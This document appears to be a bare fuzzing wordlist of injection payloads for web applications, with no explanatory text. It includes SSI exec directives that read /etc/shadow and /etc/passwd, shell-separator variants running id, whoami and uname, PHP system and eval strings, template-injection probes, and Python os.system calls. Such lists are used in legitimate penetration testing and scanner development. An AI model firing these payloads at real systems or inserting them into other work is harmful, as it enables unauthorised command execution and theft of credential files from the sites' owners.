&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
/index.html|id|
;id;
|id|
||/usr/bin/id|
||/usr/bin/id;
;id|
;|/usr/bin/id|
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
a|id|
a;id\n
&&id
;id\n
`id`
|id
| id
;id
& id
;/usr/bin/id\n
%0Acat%20/etc/passwd
%0a id %0a
%0A/usr/bin/id
%0A/usr/bin/id%0A
\n/usr/bin/id\n
perl -e 'print "X"x1024'
| perl -e 'print "X"x16096'
; perl -e 'print "X"x16096'
&& perl -e 'print "X"x16096'
:phpversion();
;${@print(md5(RCEVulnerable))};
${@print("RCEVulnerable")}
${@print(system($_SERVER['HTTP_USER_AGENT']))}
;system('cat%20/etc/passwd')
systeminfo
| systeminfo
; systeminfo
& systeminfo
&& systeminfo
system('ls')
system('pwd')
system('pwd');
system('whoami');
uname
; uname
& uname
&& uname
|/usr/bin/id
;/usr/bin/id|
$;/usr/bin/id
| whoami
; whoami
' whoami
' & whoami
' && whoami
'; whoami
" whoami
" || whoami
" | whoami
" & whoami
"; whoami
$(`whoami`)
& whoami
&& whoami
{{ get_user_file("/etc/hosts") }}
{{ get_user_file("/etc/passwd") }}
{{15264+45224}}
{{person.secret}}
{{person.name}}
`
|| 
| 
; 
'
'"
"
"'
& 
&& 
%0a
%0a%0d
%0Aid%0A
%20{${phpinfo()}}
a;id|
a;id;
cat /etc/hosts
$(`cat /etc/passwd`)
cat /etc/passwd
eval('whoami')
eval('whoami');
<!--#exec cmd="/bin/cat /etc/passwd"-->
<!--#exec cmd="/bin/cat /etc/shadow"-->
<!--#exec cmd="/usr/bin/id;-->
\n
|| phpinfo()
| phpinfo()
 {${phpinfo()}}
;phpinfo()
;phpinfo();//
';phpinfo();//
{${phpinfo()}}
& phpinfo()
&& phpinfo()
phpinfo()
phpinfo();
<?php system("cat /etc/passwd");?>
\r\n
|usr/bin/id\n
|nid\n
`/usr/bin/id`
a);id
a;id
a);id;
a);id|
a)|id
a|id
a)|id;
|/bin/ls -al
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
;system('id')
;system('/usr/bin/id')
; id
'id
'id'
'id;'
';id
';id;
__import__('os').system('id')
__import__("os").system("id")
';__import__('os').system('id');'
";__import__('os').system('id');"
